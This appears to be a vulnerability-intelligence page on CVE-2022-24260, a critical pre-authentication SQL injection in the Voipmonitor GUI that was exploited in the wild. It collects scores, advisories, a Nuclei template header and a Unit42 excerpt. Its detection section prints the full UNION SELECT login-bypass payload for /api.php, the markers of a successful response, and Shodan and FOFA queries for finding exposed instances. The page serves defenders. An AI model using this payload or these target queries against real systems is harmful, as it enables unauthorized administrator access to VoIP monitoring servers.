CVE-2022-24260
published 2022-02-04CVE-2022-24260: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
50.93%
98.8th percentile
A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| voipmonitor | voipmonitor | < 24.96 | 24.96 |
Detection & IOCsextracted from sources · hover to see the quote
url/api.php
commandmodule=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #
- →Detect exploitation attempts by monitoring POST requests to /api.php with the 'module=relogin' and 'action=login' parameters containing a UNION SELECT SQL injection payload in the 'user' field.
- →A successful exploitation response will contain both '"success":true' and '_vm_version' and '_debug' in the HTTP response body with a 200 status code.
- →Identify exposed VoipMonitor instances via Shodan query 'http.title:"VoIPmonitor"' or FOFA query 'title="voipmonitor"' as potential targets for this pre-auth SQL injection.
- →The Content-Type header 'application/x-www-form-urlencoded' is used in the exploit POST request to /api.php; monitor for anomalous UNION SELECT payloads in form-encoded login requests.
- ·The vulnerability affects VoipMonitor GUI versions before v24.96 only; patched instances (v24.96+) are not vulnerable. ↗
- ·The UNION SELECT payload uses 92 columns; the exact column count may vary if the underlying database schema differs across deployments, potentially requiring payload adjustment.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-655g-pxvh-gr5j: A SQL injection vulnerability in Voipmonitor GUI before v24
ghsa_unreviewed·2022-02-09
CVE-2022-24260 [CRITICAL] CWE-89 GHSA-655g-pxvh-gr5j: A SQL injection vulnerability in Voipmonitor GUI before v24
A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
VulnCheck
voipmonitor voipmonitor Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2022·CVSS 9.8
CVE-2022-24260 [CRITICAL] voipmonitor voipmonitor Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
voipmonitor voipmonitor Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
Affected: voipmonitor voipmonitor
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-14&host_type=src&vulnerability=cve-2022-24260; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-15&host_type=src&vulnerability=cve-2022-2426
No detection rules found.
Nuclei
VoipMonitor - Pre-Auth SQL Injection
nuclei·CVSS 9.8
CVE-2022-24260 [CRITICAL] VoipMonitor - Pre-Auth SQL Injection
VoipMonitor - Pre-Auth SQL Injection
A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
Template:
id: CVE-2022-24260
info:
name: VoipMonitor - Pre-Auth SQL Injection
author: gy741
severity: critical
description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the SQL injection vulnerability in the VoipMonitor application.
reference:
- https://kerbit.io/research/read/
Unit42
Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
blogs_unit42·2022-08-19·CVSS 8.8
CVE-2021-20166 [HIGH] Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
Threat Research Center
Trend Reports
Vulnerabilities
## Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
Yue Guan
Published: August 19, 2022
Trend Reports
Vulnerabilities
Attack analysis
CVE-2021-20166
CVE-2021-20167
CVE-2021-21881
CVE-2021-24762
CVE-2021-28169
CVE-2021-31589
CVE-2021-39226
CVE-2021-4045
CVE-2021-43711
CVE-2022-21371
CVE-2022-21662
CVE-2022-22536
CVE-2022-22947
CVE-2022-22954
CVE-2022-22963
CVE-2022-22965
CVE-2022-24112
CVE-2022-24260
CVE-2022-25060
CVE-2022-25075
CVE-2022-25134
CVE-2022-27226
CVE-2022-29464
Exploit in the wild
Network security trends
## Executive Summary
Recent observations of exploits used in the wild reveal that attackers have been making use
Unit42
Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
blogs_unit42·2022-08-19
Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
## Executive Summary
Recent observations of exploits used in the wild reveal that attackers have been making use of newly published remote code execution vulnerabilities in VMware ONE Access and Identity Manager and Spring Cloud Function, Spring MVC and Spring Web Flux, among others. Attackers have also been taking advantage of a cross-site scripting vulnerability in WordPress core, and SQL injection vulnerabilities in VoIPmonitor GUI and other services. In our observations of network security trends, Unit 42 researchers select exploits of the latest published attacks that defenders should know based on the availability of proofs of concept (PoCs), the severity of the vulnerabilities the exploits are based on and the ease of exploitation.
Other insights that could assist defenders includ
2022-02-04
Published
Exploited in the wild